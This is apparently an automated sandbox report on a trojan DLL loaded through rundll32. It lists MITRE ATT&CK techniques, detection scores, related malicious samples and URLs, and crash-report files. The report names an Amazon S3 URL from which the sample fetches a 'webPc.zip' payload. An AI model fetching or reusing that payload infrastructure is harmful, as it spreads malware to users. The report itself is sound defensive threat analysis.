Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04A48AC4 cpuid

4_2_04A48AC4

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	4_2_04A4E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_04A4DB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	12_2_043CE6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_043CDB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	13_2_03FFE6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_03FFDB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	14_2_0494E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_0494DB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	15_2_04D4E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_04D4DB7C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04A50308 GetVersion,

4_2_04A50308

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
appdata -MpSvc.dll	47%	ReversingLabs	Win32.Trojan.Generic
appdata -MpSvc.dll	100%	Avira	HEUR/AGEN.1338333
appdata -MpSvc.dll	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-r-w.sa-east-1.amazonaws.com	3.5.234.32	true	false		high
awsserver903203232.s3.sa-east-1.amazonaws.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://awsserver903203232.s3.sa-east-1.amazonaws.com/	rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip2xnL	rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	false	high
http://upx.sf.net	Amcache.hve.8.dr	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/P	rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipvx	rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.delphiforfun.org/openU	rundll32.exe, 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, appdata -MpSvc.dll	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip4G	rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipk	rundll32.exe, 0000000C.00000002.2473936771.0000000002A1E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.delphiforfun.org/	rundll32.exe	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip94RM	rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.5.234.32	s3-r-w.sa-east-1.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1405581
Start date and time:	2024-03-08 19:50:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	appdata -MpSvc.dll
Detection:	MAL
Classification:	mal72.evad.winDLL@26/16@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: appdata -MpSvc.dll

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.sa-east-1.amazonaws.com	00023948209303294#U00ac320302282349843984903.exe	Get hash	malicious	Unknown	Browse	3.5.232.137
	00023948209303294#U00ac320302282349843984903.exe	Get hash	malicious	Unknown	Browse	16.12.1.14
	0219830219301290321012notas.exe	Get hash	malicious	Unknown	Browse	3.5.232.21
	0219830219301290321012notas.exe	Get hash	malicious	Unknown	Browse	3.5.234.1
	0923840932020004-3-0.exe	Get hash	malicious	Unknown	Browse	3.5.232.185
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	52.95.163.114
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	16.12.0.34
	DOC7186723912#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.60
	DOC0974045396#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.98

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	saoJLnjLcC.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	ZAYIMfNGS6.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	j9JVfEt8Il.elf	Get hash	malicious	Unknown	Browse	34.254.182.186
	http://mydpd.space/	Get hash	malicious	DCRat, PureLog Stealer	Browse	99.84.203.3
	https://www.hiclipart.com/free-transparent-background-png-clipart-zjdjz/download	Get hash	malicious	Unknown	Browse	13.226.225.59
	http://67833.vip	Get hash	malicious	Phisher	Browse	18.244.214.32
	FW Attention New Incoming D0CS for Live-quinn on.eml	Get hash	malicious	HTMLPhisher	Browse	52.43.182.179
	https://www.trade-schools-directory.com/redir/coquredir.htm?page=college&type=popular&pos=82&dest=//gamma.app/public/This-project-proposal-aims-to-address-the-challenges-and-deliver--4tlhyfwlb1pvqx4	Get hash	malicious	Unknown	Browse	3.132.246.63
	https://www.trade-schools-directory.com/redir/coquredir.htm?page=college&type=popular&pos=82&dest=//gamma.app/public/This-project-proposal-aims-to-address-the-challenges-and-deliver--4tlhyfwlb1pvqx4	Get hash	malicious	Unknown	Browse	13.226.210.22

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	http://mydpd.space/	Get hash	malicious	DCRat, PureLog Stealer	Browse	3.5.234.32
	https://www.hiclipart.com/free-transparent-background-png-clipart-zjdjz/download	Get hash	malicious	Unknown	Browse	3.5.234.32
	Kontrolforanstaltningens31.wsf	Get hash	malicious	GuLoader, XWorm	Browse	3.5.234.32
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	3.5.234.32
	SecuriteInfo.com.Win32.PWSX-gen.10639.26376.exe	Get hash	malicious	AgentTesla	Browse	3.5.234.32
	20240306 The new order about PO#PW225084YL.50L of 23AW1203A285 2ND SAMPLE ENR xls.bat.exe	Get hash	malicious	GuLoader	Browse	3.5.234.32
	Re Remittance Advice.exe	Get hash	malicious	AgentTesla	Browse	3.5.234.32
	PO 02-2311-55R-MAP- 7Mar2024-19th Order-Euro38217- URGENT ORDER solutions -RK.exe	Get hash	malicious	AgentTesla	Browse	3.5.234.32
	SecuriteInfo.com.Unwanted-Program.0056626f1.515.26855.exe	Get hash	malicious	Unknown	Browse	3.5.234.32

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_355bab52f43c26f3ad8297a4de7f404df9f67_7522e4b5_33192ed2-e144-44e2-8fb3-696075ab36b4\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1521242973881267
Encrypted:	false
SSDEEP:	192:2U7yiLOL/gb0BU/wjeT8xmA3fzuiFFZ24IO8dci:9yiSTgoBU/wjeyfzuiFFY4IO8dci
MD5:	9729AA6095E3FD89B826B8E8B86D6AF0
SHA1:	7FF54350D57D6543A0DEAA8533F18CBA9C19D3C1
SHA-256:	E6BBE1DCE64B68E3F8A5BE45AA7FF82DA8C6E7EA5B09FE036A739BE15F7B8547
SHA-512:	BE52C98284224FB48BEAE3724947D08A4C78406EC46DA742953D14206E887BF9835431A043980869335CD972258DD32EB790FDCE98C848F2E7A74F00602E51C4
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.5.3.8.5.4.8.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.6.2.1.3.5.8.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.1.9.2.e.d.2.-.e.1.4.4.-.4.4.e.2.-.8.f.b.3.-.6.9.6.0.7.5.a.b.3.6.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.f.b.3.8.5.f.-.d.9.3.e.-.4.c.b.d.-.8.b.b.2.-.2.a.3.4.0.7.2.e.4.f.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.4.-.0.0.0.1.-.0.0.1.4.-.d.4.0.d.-.3.4.a.f.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_b65f38bb695cc2977d7b7916d954e2041a58188_7522e4b5_5a53d912-3db9-461a-b3b4-f4ed8dc99e1f\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.917538838644404
Encrypted:	false
SSDEEP:	192:dmDifONL20BU/wjeTwnQzuiFFZ24IO84ci:EDiGNLdBU/wje7zuiFFY4IO84ci
MD5:	DDEEB88F71C9BCC13371CA61C389737C
SHA1:	E360C321ACAF3EFEB96720FE273371F7EC2EDB1E
SHA-256:	9557714007841A4EF66423EF5AAB2BF084D908EC7047E000C94C6175F09206D7
SHA-512:	6A864C579FB5D8C777EC075B789F8DA2F9626E0BC4122E102E120A242FA1711BCD8D0FF37F8327A825279BED17CF5D4757614D386EFD46BC34DFD422DF07AE0D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.0.3.9.4.7.0.5.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.0.4.7.9.0.8.0.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.5.3.d.9.1.2.-.3.d.b.9.-.4.6.1.a.-.b.3.b.4.-.f.4.e.d.8.d.c.9.9.e.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.9.8.b.d.e.d.-.b.a.c.7.-.4.b.8.5.-.a.5.d.1.-.5.a.4.1.a.2.a.2.3.9.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.4.-.0.0.0.1.-.0.0.1.4.-.b.e.0.b.-.c.4.a.9.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_b65f38bb695cc2977d7b7916d954e2041a58188_7522e4b5_8753da2e-c716-4998-a44f-d25bc0c962bc\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9170449241382006
Encrypted:	false
SSDEEP:	192:iu7iInOKL20BU/wjeTtIwzuiFFZ24IO84ci:xixKLdBU/wje7zuiFFY4IO84ci
MD5:	C25020C4CD2F8F06A442323EAFC4634E
SHA1:	BC8AF848D39FA0BE6C96BDBAC1354A47848F1CFF
SHA-256:	5C1C39C75891D0D65177488208413AABE51581D6DC03D447CF348457DCFF2489
SHA-512:	BD91786731C9476B49DCEF10B44C365508BEA5F3CE1C15678BBA77C7DD39A31A70FBB55FDE65948F9D3962365F272BC95E2D27B147A379BB80F6F5040DE5390A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.0.5.2.6.4.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.9.9.0.1.5.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.5.3.d.a.2.e.-.c.7.1.6.-.4.9.9.8.-.a.4.4.f.-.d.2.5.b.c.0.c.9.6.2.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.5.0.e.7.f.7.-.a.c.d.9.-.4.3.7.b.-.a.8.3.9.-.a.5.2.3.f.2.3.3.b.4.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.8.4.-.0.0.0.1.-.0.0.1.4.-.2.1.3.0.-.4.2.a.f.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81442412364774a5aff9775d4f5b6b39b9b16_7522e4b5_de01983f-aa58-4074-9ea7-4beb57d64a3c\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9116363980528673
Encrypted:	false
SSDEEP:	192:ybvDFmUiLOA7tw0BU/wjeTtIwzuiFFZ24IO8dci:QvDwUiSstLBU/wje7zuiFFY4IO8dci
MD5:	310DA430D1F8B3373D482F9F96749F86
SHA1:	840AB1B59772664B1CB039D8F124CFBDEC76D848
SHA-256:	E6204D251F192BB0096ACD0E323279D8803C50002782BD7B177D2BC0E2F8793C
SHA-512:	3A994ED02B8F69267E2396576F215BE21068425FFFA7639408A91EBB0271FAC961C199D275B5BE565FA35EB4D8CC6401E766C0B9595971017140875BF996CAF9
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.0.4.5.6.2.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.9.9.8.7.5.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.0.1.9.8.3.f.-.a.a.5.8.-.4.0.7.4.-.9.e.a.7.-.4.b.e.b.5.7.d.6.4.a.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.5.2.5.0.3.5.-.5.5.0.8.-.4.2.a.7.-.8.5.2.f.-.e.9.e.f.5.a.1.8.d.e.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.4.-.0.0.0.1.-.0.0.1.4.-.c.e.7.a.-.3.9.a.f.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER450B.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:44 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	49840
Entropy (8bit):	1.9032938039379848
Encrypted:	false
SSDEEP:	96:5MS8aUE3TlxTe7+bIksLeuJOwG8X5RP/oi75I4v4mq5Hfa0Qyw9IVQ/11Z1sok3M:qhGuFXUO5H4wMV6XphLExLp8B1EP+u4
MD5:	B86C71C530E673D75223ADACF96685B0
SHA1:	97279C5493822058A4F24F3A8EA2C5141EF33CB1
SHA-256:	40DD2B0F219D883C615A49BE1DED6527246BF398AFBFBDC448615998629ACEB8
SHA-512:	FDB34EDD46485B672E9D2D4B1CC5A937E0491820AE076D4D9A9ED98EC34E8DC3E3DF60749C146DB7C040C57B35176307AE263C31D4CF0D66B44DD024EC34EACC
Malicious:	false
Preview:	MDMP..a..... .......@^.e........................(...............4/..........T.......8...........T............... .......................................................................................................eJ......x.......GenuineIntel............T...........?^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4663.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8334
Entropy (8bit):	3.689231439067909
Encrypted:	false
SSDEEP:	192:R6l7wVeJU66w6YNDC6xggmf8AoDpru89bQ/sfmwm:R6lXJh6w6YxC6xggmf8AoJQkfY
MD5:	280DDC83A799D3E2C3357CBD9C86703F
SHA1:	892E42561A9CF3C9B5895D739C06365B4E700AA5
SHA-256:	104B070AB5CE75547F0888CCC5C075BFFD61E8830FAF08D54891F1D3CFA2B77C
SHA-512:	44EDB2E6979F614351A064A9690E3FE43E8A56E9ED0CC0A653DF4CB9257B9D68C6B05298D1D9D8B53AFE05C582ACCF12AE837E2EEC4E09C7D2815D16A842D4B0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4693.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4759
Entropy (8bit):	4.448575800750847
Encrypted:	false
SSDEEP:	48:cvIwWl8zsFJg77aI9OkcWpW8VYFYm8M4JCdPvdFI+q8vjPv0ZUGScSDd:uIjffI7ZV7VNJHKYZUJ3Dd
MD5:	3F3605970A46A28BCD1A261B6A263D50
SHA1:	FF379748118620EA576EC0046DC952A63CD8A477
SHA-256:	77D3477BD22616E6DDEB6F84F2250DCDDFD06A766D34F2DC2D20F05499048B0B
SHA-512:	AE741B4E287FA7A4F730548B9212100C0C0F9852EB192B61ED95D4CF4B2CC276224DC9A7A1F2F76E0ED6B650BCC8BEF45F299F909EE8ED49F639E66F6FDE8E38
Malicious:	false
